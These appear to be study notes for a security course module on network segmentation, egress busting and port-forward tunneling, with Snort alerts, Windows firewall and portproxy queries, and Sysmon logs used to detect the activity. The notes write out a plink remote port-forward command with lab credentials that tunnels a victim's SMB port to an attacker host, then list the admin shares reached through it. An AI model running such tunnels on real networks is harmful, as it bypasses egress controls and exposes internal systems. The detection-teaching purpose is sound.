Module 14: Network Evasion and Tunneling

Network Segmentation

Network Segmentation Concepts and Benefits

Concepts. Google/Wikipedia it.

Segmentation Theory

Concepts. Google/Wikipedia it.

Egress Busting

Detecting Egress Busting

Snort alerts generated by the egress busting attack

offsec@snort02:~$ tail /var/log/snort/alert_fast.txt 
01/28-21:15:49.133529 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50167 -> 192.168.48.4:491
01/28-21:15:49.149038 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50168 -> 192.168.48.4:492
01/28-21:15:49.164680 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50169 -> 192.168.48.4:493
01/28-21:15:49.180393 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50170 -> 192.168.48.4:494
01/28-21:15:49.195977 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50171 -> 192.168.48.4:495
01/28-21:15:49.211640 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50172 -> 192.168.48.4:496
01/28-21:15:49.227126 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50173 -> 192.168.48.4:497
01/28-21:15:49.242844 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50174 -> 192.168.48.4:498
01/28-21:15:49.258451 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50175 -> 192.168.48.4:499
01/28-21:15:49.274751 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50176 -> 192.168.48.4:500

Port Forwarding and Tunneling

Port Forwarding and Tunneling Theory

Port Forwarding and Tunneling in Practice

Reading the Windows Firewall With Advanced Security/Firewall Event Log

PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{LogName = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'} -MaxEvents 20

   ProviderName: Microsoft-Windows-Windows Firewall With Advanced Security

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
1/31/2022 10:03:01 PM         2008 Information      Windows Defender Firewall Group Policy settings have changed. The new settings have been applied
1/31/2022 9:58:43 PM          2004 Information      A rule has been added to the Windows Defender Firewall exception list....

Listing all the inbound firewall rules

PS C:\Users\Administrator> Get-NetFirewallRule -Direction Inbound | Select-Object -Property DisplayName,Profile,Enabled | Where { $_.Enabled -eq 'True'}

DisplayName                                                                                Profile Enabled
-----------                                                                                ------- -------
...
Cortana                                                                            Domain, Private    True
Network Discovery (Pub-WSD-In)                                                             Private    True
Network Discovery (LLMNR-UDP-In)                                                           Private    True
Network Discovery (WSD-In)                                                                 Private    True
Network Discovery (SSDP-In)                                                                Private    True
Network Discovery (WSD Events-In)                                                          Private    True
Network Discovery (WSD EventsSecure-In)                                                    Private    True
Network Discovery (NB-Datagram-In)                                                         Private    True
Network Discovery (NB-Name-In)                                                             Private    True
Network Discovery (UPnP-In)                                                                Private    True
Desktop App Web Viewer                                                     Domain, Private, Public    True
forward_port_rule                                                                              Any    True

Getting detailed information usin the rule name

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule"

Name                  : {F55666F7-6A7C-4049-BEE6-CD7407E7120A}
DisplayName           : forward_port_rule
Description           :
DisplayGroup          :
Group                 :
Enabled               : True
Profile               : Any
Platform              : {}
Direction             : Inbound
Action                : Allow
EdgeTraversalPolicy   : Block
LooseSourceMapping    : False
LocalOnlyMapping      : False
Owner                 :
PrimaryStatus         : OK
Status                : The rule was parsed successfully from the store. (65536)
EnforcementStatus     : NotApplicable
PolicyStoreSource     : PersistentStore
PolicyStoreSourceType : Local

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule" | Get-NetFirewallPortFilter

Protocol      : TCP
LocalPort     : 21
RemotePort    : Any
IcmpType      : Any
DynamicTarget : Any

Inspecting the configuration of the portproxy interface using netsh

PS C:\Users\Administrator> netsh interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
172.16.50.11    21          172.16.50.12    3306

Remote port forwarding using plink.exe

echo y | plink.exe -ssh -N -l kali -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2

Confirming port forward is setup

kali@attacker01:~ $ ss -antp | grep 1234
 State     Recv-Q     Send-Q     Local Address:Port   Peer Address:Port     Process                                                                                                                                                                                                 
LISTEN    0          128        127.0.0.1:1234       0.0.0.0:*             users:(("sshd",pid=2801,fd=10))

Accessing the network shares usin smbclient

kali@attacker01:~ $ smbclient -L 127.0.0.1 --port=1234 --user=Administrator
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        htdocs          Disk      
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Listing the Sysmon event logs while filtering for the plink string in the Message

PS C:\Users\Administrator> Get-SysmonEvent | Where-Object { $_.Message -like "*plink*" }

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
2/1/2022 12:02:39 AM             1 Information      Process Create:...
2/1/2022 12:00:59 AM             5 Information      Process terminated:...
1/31/2022 11:47:42 PM            1 Information      Process Create:...
1/31/2022 11:47:34 PM            5 Information      Process terminated:...
1/31/2022 11:47:34 PM            1 Information      Process Create:...
1/31/2022 11:47:19 PM            5 Information      Process terminated:...
1/31/2022 11:47:19 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...

Getting detailed infromation from the Sysmon event logs

PS C:\Users\Administrator> Get-SysmonEvent 1 "1/31/2022 11:46:12" "2/1/2022 12:02:39" | Where-Object { $_.Message -like "*plink*" } | Format-List
...
TimeCreated  : 2/1/2022 12:02:39 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2022-02-01 08:02:39.016
               ProcessGuid: {6c804c53-e91f-61f8-9b00-000000002500}
               ProcessId: 7592
               Image: C:\xampp\htdocs\simple_upload\uploaded_files\plink.exe
               FileVersion: Release 0.76
               Description: Command-line SSH, Telnet, and Rlogin client
               Product: PuTTY suite
               Company: Simon Tatham
               OriginalFileName: Plink
               CommandLine: plink.exe  -ssh -N -l root -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2
               CurrentDirectory: C:\xampp\htdocs\simple_upload\uploaded_files\
               User: SERVER03\Administrator
               LogonGuid: {6c804c53-e8ec-61f8-069f-060000000000}
               LogonId: 0x69F06
               TerminalSessionId: 2
               IntegrityLevel: High
               Hashes: SHA256=828E81AA16B2851561FFF6D3127663EA2D1D68571F06CBD732FDF5672086924D
               ParentProcessGuid: {6c804c53-e8f5-61f8-8f00-000000002500}
               ParentProcessId: 656
               ParentImage: C:\Windows\System32\cmd.exe
               ParentCommandLine: "C:\Windows\system32\cmd.exe"
               ParentUser: SERVER03\Administrator
...

PreviousModule 13: Active Directory Enumeration NextModule 15: Windows Lateral Movement

Last updated 11 months ago

hashtagNetwork Segmentation

hashtagNetwork Segmentation Concepts and Benefits

hashtagSegmentation Theory

hashtagEgress Busting

hashtagDetecting Egress Busting

hashtagPort Forwarding and Tunneling

hashtagPort Forwarding and Tunneling Theory

hashtagPort Forwarding and Tunneling in Practice